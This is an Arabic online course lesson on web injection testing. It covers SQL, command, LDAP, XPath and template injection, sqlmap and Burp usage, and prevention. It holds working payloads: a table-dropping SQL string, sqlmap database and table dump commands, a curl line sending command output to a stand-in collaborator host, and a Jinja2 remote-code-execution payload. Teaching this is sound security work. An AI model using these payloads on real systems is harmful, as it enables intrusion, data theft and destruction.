0Pricing
Cyber Security Academy · درس

اختبار ثغرات الحقن

استخدم SQLMap والحمولات اليدوية وBurp لاختبار حقن SQL والأوامر وLDAP.

اختبار ثغرات الحقن درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

فئات ثغرات الحقن

يحدث الحقن عند إرسال بيانات غير موثوقة إلى مفسّر باعتبارها جزءًا من أمر أو استعلام. ولا يستطيع المفسّر التمييز بين البيانات والأوامر، فينفّذ منطقًا يتحكم فيه المهاجم. ويندرج حقن SQL والأوامر وLDAP وXPath والقوالب جميعًا ضمن هذه الفئة.

حقن SQL: الاختبار اليدوي

ابدؤوا بحمولات بسيطة للتحقق من وجود حقن SQL. تؤدي علامة اقتباس مفردة إلى حدوث خطأ في بنية SQL في التطبيقات المعرّضة للخطر. افحصوا رسائل الخطأ، وفروق طول الاستجابة، ووقت الاستجابة.

# Test for SQLi:
' -- basic quote
'' -- doubled quote
1' OR '1'='1 -- always-true
1; DROP TABLE users -- statement terminator

# In URL:
https://target.com/item?id=1'

SQLMap لأتمتة حقن SQL

يؤتمت SQLMap اكتشاف حقن SQL واستغلاله: إذ يكتشف نقاط الحقن، ويحدّد نظام إدارة قواعد البيانات، ويمكنه تفريغ قواعد البيانات وقراءة الملفات وتحقيق تنفيذ تعليمات برمجية على نظام التشغيل في الأنظمة المعرّضة للخطر.

# Basic scan
sqlmap -u 'http://target.com/item?id=1'

# With Burp request file
sqlmap -r request.txt

# Dump databases
sqlmap -u 'http://target.com/item?id=1' --dbs

# Dump a table
sqlmap -u '...' -D mydb -T users --dump

اختبار حقن الأوامر

يحدث حقن الأوامر عند تمرير إدخال المستخدم إلى وظائف صدفة نظام التشغيل. اختبروا باستخدام محارف الصدفة الخاصة: الفواصل المنقوطة، والأنابيب، والـ backticks، واستبدال الأوامر باستخدام $().

# Test inputs (form fields, URLs, headers):
; id
| id
`id`
$(id)
&& id

# Blind (no output): use time delays
; sleep 5
| ping -c 5 127.0.0.1

# Or out-of-band:
; curl http://collaborator.example.com/$(id)

حقن LDAP

يتلاعب حقن LDAP باستعلامات LDAP المستخدمة للمصادقة وعمليات البحث في الدليل. اختبروا حقول المصادقة باستخدام: *)(uid=*))(|(uid=* لتجاوز عوامل التصفية.

حقن XPath

يستهدف حقن XPath أنظمة المصادقة المستندة إلى XML. وهو مشابه لحقن SQL — إذ تتلاعب الحمولات باستعلامات XPath: ' or '1'='1 لتجاوز المصادقة.

حقن القوالب (SSTI)

يحدث حقن القوالب من جانب الخادم عندما يُعرض إدخال المستخدم في محرك قوالب (Jinja2 أو Twig أو Freemarker). لاكتشافه، احقنوا {{7*7}} — فإذا أظهرت الاستجابة الرقم 49، فهذا يعني وجود SSTI.

# Detection payloads:
{{7*7}}          # Jinja2, Twig
${7*7}           # Freemarker, EL
<%= 7*7 %>      # ERB (Ruby)

# RCE via Jinja2:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

استخدام Burp لاختبار الحقن

أرسلوا الطلبات إلى Repeater وحقنوا الحمولات يدويًا في كل معلمة. استخدموا Intruder لأتمتة الاختبار باستخدام قوائم كلمات خاصة بالحقن (تحتوي SecLists على حمولات حقن ممتازة).

# SecLists injection wordlists:
/usr/share/seclists/Fuzzing/SQLi/
/usr/share/seclists/Fuzzing/SSTI/
/usr/share/seclists/Fuzzing/command-injection*

اكتشاف الحقن الأعمى

عند عدم ظهور أي مخرجات، استخدموا: التأخيرات الزمنية لتأكيد التنفيذ، واستدعاءات DNS خارج النطاق (Burp Collaborator أو interactsh)، والاستجابات القائمة على القيم المنطقية (تغيّرات طول المحتوى).

قراءة رسائل أخطاء التطبيق

تكشف الأخطاء التفصيلية نوع قاعدة البيانات وبنية الاستعلام ومسارات الملفات — وهي معلومات لا تُقدّر بثمن لصياغة حمولات دقيقة. اختبروا دائمًا باستخدام مدخلات تكشف أخطاء التصحيح أو الأخطاء إلى جانب الحمولات العادية.

مرجع الوقاية

تُمنع ثغرات الحقن باستخدام: الاستعلامات ذات المعلمات (حقن SQL)، والتحقق من المدخلات وتهريب أوامر الصدفة (حقن الأوامر)، وتجنّب عرض إدخال المستخدم في القوالب (SSTI). يجب على المطوّرين فهم هذه الأساليب لكتابة تعليمات برمجية آمنة.

تحقق سريع

ماذا تؤكد حمولة اكتشاف SSTI {{7*7}} عندما تعرض الاستجابة الرقم 49؟

ملخص: اختبار الحقن

تنتج ثغرات الحقن عن خلط البيانات بالأوامر. اختبروا كل إدخال يتحكم فيه المستخدم باستخدام حمولات حقن SQL والأوامر والقوالب وLDAP. استخدموا SQLMap لأتمتة حقن SQL، وBurp Repeater للاختبار اليدوي، وتقنيات التأخير الزمني/خارج النطاق للاستغلال الأعمى. وثّقوا دائمًا الحمولات والأدلة في التقرير.

الأسئلة الشائعة

هل درس «اختبار ثغرات الحقن» مجاني؟

نعم — نص درس «اختبار ثغرات الحقن» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «اختبار ثغرات الحقن»؟

استخدم SQLMap والحمولات اليدوية وBurp لاختبار حقن SQL والأوامر وLDAP. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.

كم من الوقت يستغرق درس «اختبار ثغرات الحقن»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. وكيل Burp Suite واعتراض الطلبات
  2. اختبار ثغرات الحقن
  3. اختبار المصادقة والجلسات
  4. ثغرات رفع الملفات وSSRF
← العودة إلى Cyber Security Academy